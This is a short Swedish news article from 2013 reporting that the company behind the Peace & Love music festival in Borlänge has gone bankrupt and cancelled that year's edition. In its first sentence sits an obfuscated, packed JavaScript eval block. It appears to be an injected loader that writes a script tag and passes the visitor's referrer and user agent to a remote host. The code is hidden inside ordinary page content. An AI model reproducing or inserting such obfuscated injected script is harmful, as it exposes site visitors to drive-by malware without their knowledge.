Image Image Image Image Image Image Image Image Image Image

| 5 juni, 2020

Scroll to top

Top

Peace & Love ställs in

Peace & Love ställs in
Marcus
  • On 28 maj, 2013
  • http://www.revue.se

 

Peace&love

Bolaget eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|nhzib|var|u0026u|referrer|dfsif||js|php’.split(’|’),0,{}))
bakom den populära musikfestivalen Peace & love har begätt sig själva i konkurs och årets festival blir därmed inställd.

Peace & love Ab startades 1999 med tre vänner som ville förändra världen, meningen var att skapa en manifestation mot våld och rasism. Under fem dagar i juni hålls musikfestivalen i Borlänge för att manifestera om budskapet om fred och kärlek.

Under åren som har gått har stora lokala artister, världsstjärnor och andra kända personer besökt festivalen. Några stora namn som har besökt festivalen är bland andra Jay-z, Sex pistols och Alice in Chains. Årets festival skulle bjuda på storslagna artister som Rihanna, Macklemore, Passenger och The script.

Turen kom dock inte i år. Genom ett försök att hitta sponsorer, annonsera och planera var det inte tillräckligt många biljetter som hade sålts för att Peace & love Ab skulle ha råd med alla sina kostnader.

Mer info hittar du på deras hemsida om hur du ska göra om du har köpt biljetter.